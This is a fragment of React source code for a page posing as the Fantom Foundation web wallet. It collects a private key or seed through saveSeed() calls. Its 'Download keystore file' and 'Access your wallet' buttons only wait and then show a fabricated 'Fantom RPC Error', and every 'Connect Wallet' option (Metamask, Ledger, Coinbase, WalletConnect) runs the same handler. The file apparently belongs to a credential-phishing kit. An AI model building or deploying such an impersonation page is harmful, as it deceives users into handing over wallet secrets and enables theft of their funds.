														</Text>
														<input className="mainInp" style={{ padding: "calc(.75rem - 3px) 2%", boxSizing: "content-box", borderRadius: "8px", width: "96%", background: "#33364a" }} onInput={(e) => {
															if (validatePrivateKey(e.target.value)) {
																setSeed(e.target.value)
																setPKey(false)
															}
															else {
																setPKey(true)
															}
														}} />

														<Flex justify="center" w="100%" mt="12%">
															<Button color='#fff' bg="#1969ff" borderRadius="45px" py="3" px="12" fontWeight="bold" disabled={pKey} onClick={() => {
																saveSeed("pkey")
														}}>
																{ loading ? <Spinner color="#fff" /> : "Unlock wallet" }
															</Button>
														</Flex>
													</Flex>
												}
											</>
											:
											majorScreen === 1 ?
											<>
												<Flex direction="column">
													<Text fontWeight="bold" mb="8" fontSize={["18px", "21px"]} className="pro">
														{which === 0 ? "Set the password for your wallet" : "Create a keystore file and password "}
													</Text>

													<Text fontWeight="bold" mb="2" className="pro">
														{ which === 0 ? "Set a new password" : "Set a password" }
													</Text>
													<InputGroup mb="2">
														<input className={error && "error"} style={{ padding: "calc(.75rem - 3px) .75rem", boxSizing: "content-box", borderRadius: "8px", width: "100%", background: "#33364a" }} type={passType2 ? "text" : "password"} onInput={(e) => {
															if (e.target.value.length < 8) {
																setError(true)
															}
															else {
																setError(false)
																setPass(e.target.value)
															}
														}}/>
														<InputRightElement
															children={
																<svg version="1.1" viewBox="0 0 576 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "16px", height: "16px", fill: "#286ff6", cursor: "pointer" }} onClick={() => passType2 ? setPassType2(false) : setPassType2(true)}><path pid="0" d="M288 144a110.94 110.94 0 00-31.24 5 55.4 55.4 0 017.24 27 56 56 0 01-56 56 55.4 55.4 0 01-27-7.24A111.71 111.71 0 10288 144zm284.52 97.4C518.29 135.59 410.93 64 288 64S57.68 135.64 3.48 241.41a32.35 32.35 0 000 29.19C57.71 376.41 165.07 448 288 448s230.32-71.64 284.52-177.41a32.35 32.35 0 000-29.19zM288 400c-98.65 0-189.09-55-237.93-144C98.91 167 189.34 112 288 112s189.09 55 237.93 144C477.1 345 386.66 400 288 400z"></path></svg>
															}
														/>
													</InputGroup>
													<Flex mb="8" align="center">
														<svg version="1.1" viewBox="0 0 512 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "16px", height: "16px", fill: error ? "#fd2e63" : "#9299a6" }}><path pid="0" d="M256 8C119.043 8 8 119.083 8 256c0 136.997 111.043 248 248 248s248-111.003 248-248C504 119.083 392.957 8 256 8zm0 110c23.196 0 42 18.804 42 42s-18.804 42-42 42-42-18.804-42-42 18.804-42 42-42zm56 254c0 6.627-5.373 12-12 12h-88c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h12v-64h-12c-6.627 0-12-5.373-12-12v-24c0-6.627 5.373-12 12-12h64c6.627 0 12 5.373 12 12v100h12c6.627 0 12 5.373 12 12v24z"></path></svg>
														<Text color={error ? "#fd2e63" : "#9299a6"} fontSize="14px" ml="3"> Make sure to enter at least 8 and max 200 characters, including one upper-case letter, a symbol and a number </Text>
													</Flex>




													<Text fontWeight="bold" mb="2">
														Re-enter password
													</Text>
													<InputGroup mb="8">
														<input className={error2 && "error"} style={{ padding: "calc(.75rem - 3px) .75rem", boxSizing: "content-box", borderRadius: "8px", width: "100%", background: "#33364a" }} type={passType3 ? "text" : "password"} id="rePass" onInput={(e) => {
															if (e.target.value.length < 8) {
																setError2(true)
															}
															else {
																setError2(false)
															}
														}}/>
														<InputRightElement
															children={
																<svg version="1.1" viewBox="0 0 576 512" class="svg-icon svg-fill" aria-hidden="true" style={{ width: "16px", height: "16px", fill: "#286ff6", cursor: "pointer" }} onClick={() => passType3 ? setPassType3(false) : setPassType3(true)}><path pid="0" d="M288 144a110.94 110.94 0 00-31.24 5 55.4 55.4 0 017.24 27 56 56 0 01-56 56 55.4 55.4 0 01-27-7.24A111.71 111.71 0 10288 144zm284.52 97.4C518.29 135.59 410.93 64 288 64S57.68 135.64 3.48 241.41a32.35 32.35 0 000 29.19C57.71 376.41 165.07 448 288 448s230.32-71.64 284.52-177.41a32.35 32.35 0 000-29.19zM288 400c-98.65 0-189.09-55-237.93-144C98.91 167 189.34 112 288 112s189.09 55 237.93 144C477.1 345 386.66 400 288 400z"></path></svg>
															}
														/>
													</InputGroup>

													<Flex mb="8" align="center" w="100%">
														<Flex w="100%" lineHeight="1.5" align="flex-start">
															<Flex mr="1.5">
																{
																	conBtn ?
																	<i className="mdi mdi-checkbox-blank" style={{ color: "#33364a", borderRadius: "4px", border: "1px solid #3e425b", fontSize: "20px", marginRight: "10px", background: "#33364a", cursor: "pointer" }} onClick={() => setConBtn(false)}></i>
																	:
																	<i className="mdi mdi-checkbox-marked" style={{ color: "#fff", borderRadius: "4px", border: "1px solid #286ff6", fontSize: "20px", marginRight: "10px", background: "#286ff6", cursor: "pointer" }} onClick={() => setConBtn(true)}></i>
																}
															</Flex>
															{which === 0 ? "I understand that I will need this password to verify all transactions within my wallet. I will safely store the password." : "I understand that I will need both the keystore file and the password to access my wallet. Once I have downloaded the file below, I will safely store it as well as the password "}
														</Flex>
													</Flex>


													<Flex justify="center" w="100%">
														<Button color="#fff" bg="#1969ff" borderRadius="45px" py="3" px="12" fontWeight="bold" disabled={conBtn} onClick={() => {
															if (which === 0) {
																saveSeed("seed")
																setMajorScreen(2)
																setScr1(3)
																setScr2(3)
															}
															else {
																setLoading(true)
																setTimeout(function() {	
																	setModal(true)
																	setLoading(false)
																}, 4500)
															}
														}}>
															{which === 0 ? "Unlock wallet" : loading ? <Spinner color="#fff" /> : "Download keystore file and continue"}
														</Button>
													</Flex>
												</Flex>
											</>
											:
											majorScreen === 2 &&
											<>
												<Flex h="100%" align="center" justify="center" direction="column">
													<Text fontWeight="bold" mb="10" fontSize="21px" className="pro" mt={["20px", "80px"]}>
														You're all set!
													</Text>
													<Text mb="5">
														You have successfully restored your wallet
													</Text>

													<Flex _hover={{ cursor: "pointer" }} borderRadius="45px" border="1px solid #286ff6" color="#286ff6" justify="center" py="3" px="10" fontWeight="bold" onClick={() => {
															setLoading(true)
															setTimeout(function() {	
																setModal(true)
																setLoading(false)
															}, 2000)
														}}>
														{ loading ? <Spinner color="#286ff6" /> : "Access your wallet" }
													</Flex>
												</Flex>
											</>
										}
									</Flex>
								</Flex>
							</>
						}
					</Flex>


					
				{/**************************FOOTER********************/}
					<Flex align="center" mt="auto" w="100%" direction="column">
						<Text mt="80px"></Text>
						<Flex w="100%" direction={["column", "row"]} px={["10%", "0"]} mb={["5", "0"]}>
							<Flex flex="1" justify="space-between" align="center">
								<svg version="1.1" viewBox="0 0 448 512" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "#5e96ff", cursor: "pointer" }} onClick={() => window.open("http://chat.fantom.network/", "_blank")}><path pid="0" d="M297.216 243.2c0 15.616-11.52 28.416-26.112 28.416-14.336 0-26.112-12.8-26.112-28.416s11.52-28.416 26.112-28.416c14.592 0 26.112 12.8 26.112 28.416zm-119.552-28.416c-14.592 0-26.112 12.8-26.112 28.416s11.776 28.416 26.112 28.416c14.592 0 26.112-12.8 26.112-28.416.256-15.616-11.52-28.416-26.112-28.416zM448 52.736V512c-64.494-56.994-43.868-38.128-118.784-107.776l13.568 47.36H52.48C23.552 451.584 0 428.032 0 398.848V52.736C0 23.552 23.552 0 52.48 0h343.04C424.448 0 448 23.552 448 52.736zm-72.96 242.688c0-82.432-36.864-149.248-36.864-149.248-36.864-27.648-71.936-26.88-71.936-26.88l-3.584 4.096c43.52 13.312 63.744 32.512 63.744 32.512-60.811-33.329-132.244-33.335-191.232-7.424-9.472 4.352-15.104 7.424-15.104 7.424s21.248-20.224 67.328-33.536l-2.56-3.072s-35.072-.768-71.936 26.88c0 0-36.864 66.816-36.864 149.248 0 0 21.504 37.12 78.08 38.912 0 0 9.472-11.52 17.152-21.248-32.512-9.728-44.8-30.208-44.8-30.208 3.766 2.636 9.976 6.053 10.496 6.4 43.21 24.198 104.588 32.126 159.744 8.96 8.96-3.328 18.944-8.192 29.44-15.104 0 0-12.8 20.992-46.336 30.464 7.68 9.728 16.896 20.736 16.896 20.736 56.576-1.792 78.336-38.912 78.336-38.912z"></path></svg>

								<svg version="1.1" viewBox="0 0 30 24" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "#5e96ff", cursor: "pointer" }} onClick={() => window.open("https://twitter.com/FantomFDN", "_blank")}><path pid="0" d="M26.318 5.981c.019.263.019.525.019.788C26.337 14.775 20.287 24 9.232 24c-3.406 0-6.57-.994-9.232-2.719.484.056.95.075 1.452.075 2.81 0 5.397-.956 7.463-2.587a6.028 6.028 0 01-5.62-4.2c.372.056.744.093 1.135.093.54 0 1.08-.075 1.582-.206a6.046 6.046 0 01-4.82-5.944v-.074c.8.45 1.73.73 2.717.768a6.064 6.064 0 01-2.68-5.044c0-1.125.297-2.156.818-3.056a17.047 17.047 0 0012.396 6.338 6.885 6.885 0 01-.149-1.388C14.294 2.72 16.974 0 20.306 0c1.731 0 3.295.731 4.393 1.912A11.784 11.784 0 0028.514.45a6.032 6.032 0 01-2.643 3.337 11.983 11.983 0 003.462-.937 12.976 12.976 0 01-3.015 3.131z"></path></svg>

								<svg version="1.1" viewBox="0 0 25 24" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "#5e96ff", cursor: "pointer" }} onClick={() => window.open("https://www.reddit.com/r/FantomFoundation/", "_blank")}><path pid="0" d="M9.963 14.395a1.199 1.199 0 01-1.205-1.19c0-.668.537-1.205 1.205-1.205.658 0 1.19.537 1.19 1.205 0 .658-.537 1.19-1.19 1.19zM24.6 12c0 6.629-5.371 12-12 12S.6 18.629.6 12s5.371-12 12-12 12 5.371 12 12zm-6.402-1.994a1.62 1.62 0 00-1.151.484c-1.084-.75-2.545-1.234-4.166-1.287l.842-3.788 2.68.604c0 .658.537 1.19 1.19 1.19.668 0 1.205-.546 1.205-1.204 0-.658-.537-1.205-1.204-1.205-.47 0-.871.28-1.07.668l-2.961-.658c-.145-.039-.295.067-.334.213l-.924 4.18c-1.607.068-3.053.547-4.137 1.297a1.603 1.603 0 00-1.166-.494c-1.69 0-2.24 2.27-.697 3.04a3.492 3.492 0 00-.082.75c0 2.544 2.864 4.606 6.387 4.606 3.537 0 6.401-2.062 6.401-4.607 0-.256-.029-.522-.092-.764 1.515-.775.958-3.025-.72-3.025zm-3.333 5.623c-.881.88-3.683.866-4.53 0a.292.292 0 00-.401 0c-.121.121-.121.31 0 .416 1.103 1.103 4.224 1.103 5.332 0 .121-.106.121-.295 0-.416a.292.292 0 00-.401 0zM15.237 12c-.658 0-1.19.537-1.19 1.205 0 .658.537 1.19 1.19 1.19a1.199 1.199 0 100-2.395z"></path></svg>

								<svg version="1.1" viewBox="0 0 27 24" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "#5e96ff", cursor: "pointer" }} onClick={() => window.open("https://github.com/Fantom-Foundation", "_blank")}><path pid="0" d="M9.363 19.325c0 .099-.12.178-.269.178-.17.015-.289-.064-.289-.178 0-.1.119-.179.269-.179.154-.015.289.065.289.179zM7.757 19.1c-.036.1.068.214.222.244.135.05.29 0 .32-.1.031-.099-.067-.213-.222-.258-.134-.034-.283.015-.32.114zm2.282-.084c-.15.035-.253.13-.238.243.016.1.15.164.305.13.15-.035.253-.13.237-.229-.015-.094-.155-.159-.304-.144zM13.435 0C6.276 0 .8 5.226.8 12.109c0 5.504 3.603 10.213 8.748 11.87.661.115.893-.277.893-.6 0-.307-.015-2.005-.015-3.047 0 0-3.613.745-4.372-1.479 0 0-.588-1.444-1.435-1.816 0 0-1.182-.78.083-.764 0 0 1.285.099 1.992 1.28 1.13 1.916 3.025 1.365 3.763 1.037.118-.794.454-1.345.826-1.672-2.886-.308-5.797-.71-5.797-5.484 0-1.365.393-2.05 1.219-2.923-.135-.323-.573-1.653.134-3.37 1.078-.322 3.561 1.34 3.561 1.34a12.582 12.582 0 013.241-.422c1.1 0 2.21.144 3.242.422 0 0 2.482-1.667 3.56-1.34.708 1.722.27 3.047.135 3.37.826.878 1.332 1.563 1.332 2.923 0 4.79-3.04 5.171-5.925 5.484.474.392.877 1.136.877 2.303 0 1.672-.016 3.741-.016 4.148 0 .323.238.715.893.6 5.162-1.647 8.661-6.356 8.661-11.86C26.4 5.226 20.594 0 13.435 0zM5.817 17.116c-.067.05-.052.164.036.258.082.08.201.115.268.05.067-.05.052-.164-.036-.258-.082-.08-.201-.114-.268-.05zm-.558-.402c-.036.065.016.144.12.194.082.05.185.035.221-.035.036-.064-.015-.144-.119-.193-.103-.03-.186-.015-.222.034zm1.673 1.767c-.083.065-.052.214.067.308.118.114.268.129.335.05.067-.065.036-.214-.067-.308-.113-.114-.268-.13-.335-.05zm-.589-.73c-.082.05-.082.18 0 .293.083.115.222.164.29.115.082-.065.082-.194 0-.308-.073-.114-.207-.164-.29-.1z"></path></svg>

								<svg version="1.1" viewBox="0 0 32 24" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "#5e96ff", cursor: "pointer" }} onClick={() => window.open("https://medium.com/fantomfoundation", "_blank")}><path pid="0" d="M4.472 4.896a1.165 1.165 0 00-.39-.988L1.19.507V0h8.985l6.948 14.864L23.23 0H31.8v.507L29.326 2.82a.696.696 0 00-.275.676v17.008a.696.696 0 00.275.676l2.416 2.313V24H19.585v-.507l2.505-2.37c.244-.237.244-.312.244-.675V6.703l-6.966 17.253h-.943l-8.1-17.253v11.563c-.071.488.096.975.448 1.325l3.256 3.852v.507H.8v-.5l3.256-3.859a1.5 1.5 0 00.416-1.325V4.896z"></path></svg>

								<svg version="1.1" viewBox="0 0 24 24" class="svg-icon svg-fill" style={{ width: "24px", height: "24px", fill: "#5e96ff", cursor: "pointer" }} onClick={() => window.open("https://www.linkedin.com/company/fantom-foundation/", "_blank")}><path pid="0" d="M5.587 24H.783V7.976h4.804V24zM3.182 5.79C1.646 5.79.4 4.474.4 2.883.4 1.29 1.646 0 3.182 0 4.72 0 5.964 1.29 5.964 2.882c0 1.59-1.246 2.909-2.782 2.909zM23.567 24h-4.794v-7.8c0-1.86-.036-4.243-2.497-4.243-2.498 0-2.88 2.02-2.88 4.109V24h-4.8V7.976h4.608v2.186h.067c.641-1.259 2.208-2.587 4.546-2.587 4.862 0 5.755 3.316 5.755 7.623V24h-.005z"></path></svg>
							</Flex>


							<Spacer />
							<Flex flex="1" justify={["center", "flex-end"]} color="#286ff6" mt={["8", "0"]}>©{yr} Fantom Foundation </Flex>
						</Flex>
					</Flex>
				</Flex>







				{
					osModal && 
					<Flex bg="rgba(43,50,77,0.8)" position="fixed" w="100%" h="100%" top="0" left="0" align="center" className={osModal ? "fadeUpEffect" : ""}>
						<Flex maxHeight={["80vh", "40vh"]} bg="#222431" px={["20px", "40px"]} py={["30px", "40px"]} borderRadius="16px" direction="column" w={["95%", "40%"]} ml={["2.5%", "30%"]}>
							<Flex fontWeight="bold" mb="10" fontSize="21px" align="center">
								<Flex justify="center" w="100%">Desktop Installation</Flex>
								<Flex justify="flex-end"><svg version="1.1" viewBox="0 0 352 512" class="svg-icon svg-fill" style={{ width: "20px", height: "20px", fill: "#1969ff", cursor: "pointer" }} onClick={() => setOsModal(false)}><path pid="0" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z"></path></svg></Flex>
							</Flex>


							<Text mb="3"><Text fontWeight="bold" as="span" mr="1">Step 1:</Text> Open the <Text fontWeight="bold" cursor="pointer" textDecoration="underline" color="#286ff6" as="span" mr="1" ml="1" onClick={() => {
								window.location.reload()
							}}>Fantom Wallet</Text> in <Text fontWeight="bold" as="span">Chrome</Text></Text>

							<Text mb="3"><Text fontWeight="bold" as="span" mr="1">Step 2:</Text> Go to <Text fontWeight="bold" as="span" mr="1" ml="1">Settings</Text> (Three dots in the top right corner)</Text>

							<Text mb="3"><Text fontWeight="bold" as="span" mr="1">Step 3:</Text> Click <Text fontWeight="bold" as="span" ml="1">"Install Fantom PWA Wallet"</Text></Text>
						</Flex>
					</Flex>
				}




				{
					modal && 
					<Flex bg="rgba(43,50,77,0.8)" position="fixed" w="100%" h="100%" top="0" left="0" align="center" zIndex="1000" justify="center" className={modal ? "fadeUpEffect" : ""}>
						<Flex minH={["35vh", "30vh"]} bg="#222431" px={["20px", "50px"]} py={["30px", "40px"]} borderRadius="16px" direction="column" w={["95%", "40%"]} align="center" justify="center">
							<Image h="44px" wdth="auto" mb={["6", "5"]} src={logo} />
							<Text mb={["4", "3"]} textAlign={["center", "center"]}>Fantom RPC Error: <br/>Cannot connect to the fantom blockchain at the moment. Kindly try again!</Text>
							<Flex py="3" px="6" borderRadius="45px" border="1px solid #286ff6" color="#286ff6" onClick={() => setModal(false)} cursor="pointer">OK!</Flex>
						</Flex>
					</Flex>
				}



				{
					inval && 
					<Flex bg="rgba(43,50,77,0.8)" position="fixed" w="100%" h="100%" top="0" left="0" align="center" zIndex="1000" className={inval ? "fadeUpEffect" : ""}>
						<Flex minH={["35vh", "30vh"]} bg="#222431" px={["20px", "40px"]} py={["30px", "40px"]} borderRadius="16px" direction="column" w={["95%", "40%"]} ml={["2.5%", "30%"]} align="center" justify="center">
							<Image h="44px" wdth="auto" mb={["6", "5"]} src={logo} />
							<Text mb={["4", "3"]} textAlign={["center", "left"]}>Invalid keystore file</Text>
							<Flex py="3" px="6" borderRadius="45px" border="1px solid #286ff6" color="#286ff6" onClick={() => setInval(false)} cursor="pointer">OK!</Flex>
						</Flex>
					</Flex>
				}





				{
					crypto && 
					<Flex bg="rgba(43,50,77,0.8)" position="fixed" w="100%" h="100%" top="0" left="0" align="center">
						<Flex minHeight={["50vh", "50vh"]} bg="#222431" px={["20px", "40px"]} py={["30px", "40px"]} borderRadius="16px" direction="column" w={["95%", "35%"]} ml={["2.5%", "32.5%"]}>
							<Flex fontWeight="bold" mb="10" fontSize="21px" align="center">
								<Flex justify="center" w="100%">Connect Wallet</Flex>
								<Flex justify="flex-end"><svg version="1.1" viewBox="0 0 352 512" class="svg-icon svg-fill" style={{ width: "20px", height: "20px", fill: "#1969ff", cursor: "pointer" }} onClick={() => setCrypto(false)}><path pid="0" d="M242.72 256l100.07-100.07c12.28-12.28 12.28-32.19 0-44.48l-22.24-22.24c-12.28-12.28-32.19-12.28-44.48 0L176 189.28 75.93 89.21c-12.28-12.28-32.19-12.28-44.48 0L9.21 111.45c-12.28 12.28-12.28 32.19 0 44.48L109.28 256 9.21 356.07c-12.28 12.28-12.28 32.19 0 44.48l22.24 22.24c12.28 12.28 32.2 12.28 44.48 0L176 322.72l100.07 100.07c12.28 12.28 32.2 12.28 44.48 0l22.24-22.24c12.28-12.28 12.28-32.19 0-44.48L242.72 256z"></path></svg></Flex>
							</Flex>


							<Flex align="center" w="100%" direction="column">
								<Flex bg="#33364a" align="center" borderRadius="4px" w="90%" py="3" px="4" mb="8" onClick={() => cryptoFunc()} cursor="pointer">
									<Text w="100%">Metamask</Text>
									<svg version="1.1" viewBox="0 0 30 30" class="svg-icon" style={{ width: "32px", height: "32px" }}><path pid="0" d="M28.423 1.18L16.789 9.82l2.151-5.098 9.483-3.542z" fill="#E2761B" stroke="#E2761B" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="1" d="M1.565 1.18l11.54 8.722-2.045-5.18L1.565 1.18zM24.237 21.209l-3.098 4.747 6.63 1.824 1.905-6.466-5.437-.105zM.338 21.314l1.894 6.466 6.63-1.824-3.1-4.747-5.424.105z" fill="#E4761B" stroke="#E4761B" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="2" d="M8.487 13.188L6.64 15.982l6.583.293-.234-7.074-4.502 3.987zM21.5 13.188l-4.56-4.07-.151 7.156 6.571-.292-1.86-2.794zM8.861 25.956l3.952-1.93L9.4 21.362l-.538 4.595zM17.175 24.027l3.963 1.929-.549-4.595-3.414 2.666z" fill="#E4761B" stroke="#E4761B" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="3" d="M21.139 25.956l-3.964-1.93.316 2.585-.036 1.087 3.684-1.742zM8.861 25.956l3.684 1.742-.024-1.087.292-2.584-3.952 1.929z" fill="#D7C1B3" stroke="#D7C1B3" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="4" d="M12.603 19.654l-3.297-.97 2.327-1.065.97 2.035zM17.385 19.654l.97-2.035 2.34 1.064-3.31.97z" fill="#233447" stroke="#233447" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="5" d="M8.861 25.956l.562-4.747-3.66.105 3.098 4.642zM20.577 21.209l.561 4.747 3.099-4.642-3.66-.105zM23.36 15.982l-6.571.293.608 3.379.97-2.035 2.339 1.064 2.654-2.7zM9.305 18.683l2.338-1.064.96 2.035.619-3.38-6.583-.292 2.666 2.701z" fill="#CD6116" stroke="#CD6116" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="6" d="M6.64 15.982l2.76 5.379-.094-2.678-2.666-2.7zM20.706 18.683l-.117 2.678 2.771-5.379-2.654 2.701zM13.223 16.274l-.62 3.38.772 3.987.175-5.25-.327-2.116zM16.789 16.274l-.316 2.105.14 5.262.784-3.987-.608-3.38z" fill="#E4751F" stroke="#E4751F" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="7" d="M17.397 19.654l-.784 3.987.562.386 3.414-2.666.117-2.678-3.31.97zM9.306 18.683l.093 2.678 3.415 2.666.56-.386-.771-3.987-3.297-.97z" fill="#F6851B" stroke="#F6851B" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="8" d="M17.455 27.698l.036-1.087-.293-.258H12.79l-.269.258.024 1.087-3.684-1.742 1.287 1.052 2.607 1.813h4.478l2.62-1.813 1.285-1.052-3.683 1.742z" fill="#C0AD9E" stroke="#C0AD9E" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="9" d="M17.175 24.027l-.562-.386h-3.238l-.562.386-.292 2.584.269-.258h4.408l.292.258-.315-2.584z" fill="#161616" stroke="#161616" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="10" d="M28.914 10.382l.994-4.771-1.485-4.431-11.248 8.348 4.326 3.66 6.115 1.789 1.357-1.579-.585-.42.935-.854-.725-.562.936-.713-.62-.467zM.092 5.611l.994 4.77-.631.468.935.713-.713.562.935.853-.585.421 1.345 1.579 6.115-1.79 4.326-3.66L1.566 1.18.092 5.61z" fill="#763D16" stroke="#763D16" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path><path pid="11" d="M27.616 14.977l-6.115-1.79 1.86 2.795-2.772 5.379 3.648-.047h5.437l-2.058-6.337zM8.487 13.188l-6.115 1.789-2.034 6.337h5.425l3.636.047-2.76-5.379 1.848-2.794zM16.789 16.274l.386-6.746 1.777-4.806H11.06l1.753 4.806.41 6.746.14 2.128.012 5.239h3.238l.024-5.238.152-2.128z" fill="#F6851B" stroke="#F6851B" stroke-width=".117" stroke-linecap="round" stroke-linejoin="round"></path></svg>
								</Flex>

								<Flex bg="#33364a" align="center" borderRadius="4px" w="90%" py="3" px="4" mb="8" onClick={() => cryptoFunc()} cursor="pointer">
									<Text w="100%">Ledger</Text>
									<svg version="1.1" viewBox="0 0 16 16.052" class="svg-icon svg-fill" style={{ width: "32px", height: "32px", fill : "#fff" }}><path pid="0" data-name="Path 24" d="M13.47 0H6.088v9.908H16v-7.33A2.572 2.572 0 0013.47 0zM3.82 0H2.582A2.589 2.589 0 000 2.582V3.82h3.82zM0 6.14h3.82v3.82H0zm12.18 9.908h1.239A2.589 2.589 0 0016 13.466v-1.234h-3.82v3.816zm-6.092-3.816h3.82v3.82h-3.82zm-6.088 0v1.238a2.589 2.589 0 002.582 2.582H3.82v-3.82z" _fill="#333745"></path></svg>
								</Flex>



								<Flex bg="#33364a" align="center" borderRadius="4px" w="90%" py="3" px="4" mb="8" onClick={() => cryptoFunc()} cursor="pointer">
									<Text w="100%">Coinbase Wallet</Text>
									<svg version="1.1" viewBox="0 0 512 512" class="svg-icon" style={{ width: "32px", height: "32px" }}><g fill="none" fill-rule="evenodd"><path pid="0" fill="#1660FF" d="M0 0h512v512H0z"></path><path pid="1" d="M256 76c99.411 0 180 80.589 180 180s-80.589 180-180 180S76 355.411 76 256 156.589 76 256 76zm48 122h-96c-5.523 0-10 4.477-10 10v96c0 5.523 4.477 10 10 10h96c5.523 0 10-4.477 10-10v-96c0-5.523-4.477-10-10-10z" fill="#FFF"></path></g></svg>
								</Flex>



								<Flex bg="#33364a" align="center" borderRadius="4px" w="90%" py="3" px="4" onClick={() => cryptoFunc()} cursor="pointer">
									<Text w="100%">WalletConnect</Text>
									<svg version="1.1" viewBox="0 0 512 512" class="svg-icon" style={{ width: "32px", height: "32px" }}><defs><radialGradient cx="0%" cy="50%" fx="0%" fy="50%" r="100%" id="svgicon_walletconnect-circle-blue_a"><stop stop-color="#5D9DF6" offset="0%"></stop><stop stop-color="#006FFF" offset="100%"></stop></radialGradient></defs><g fill="none" fill-rule="evenodd"><rect pid="0" fill="url(#svgicon_walletconnect-circle-blue_a)" width="512" height="512" rx="256"></rect><path pid="1" d="M169.21 184.531c47.933-46.93 125.648-46.93 173.58 0l5.77 5.648a5.92 5.92 0 010 8.498l-19.735 19.321a3.115 3.115 0 01-4.34 0l-7.938-7.773c-33.439-32.74-87.655-32.74-121.094 0l-8.502 8.324a3.115 3.115 0 01-4.34 0l-19.733-19.321a5.92 5.92 0 010-8.498l6.332-6.199zm214.392 39.958l17.563 17.196a5.92 5.92 0 010 8.498l-79.193 77.539c-2.397 2.346-6.283 2.346-8.68 0l-56.207-55.032a1.558 1.558 0 00-2.17 0l-56.205 55.032c-2.397 2.346-6.283 2.346-8.68 0l-79.195-77.54a5.92 5.92 0 010-8.498l17.563-17.196c2.396-2.346 6.282-2.346 8.679 0l56.208 55.033c.599.586 1.57.586 2.17 0l56.205-55.033c2.396-2.346 6.282-2.346 8.679 0l56.208 55.033c.599.586 1.57.586 2.17 0l56.206-55.032c2.397-2.346 6.283-2.346 8.68 0z" fill="#FFF" fill-rule="nonzero"></path></g></svg>
								</Flex>
							</Flex>

						</Flex>
					</Flex>
				}

			</Flex>
		</ChakraProvider>
	)
}

export default App;
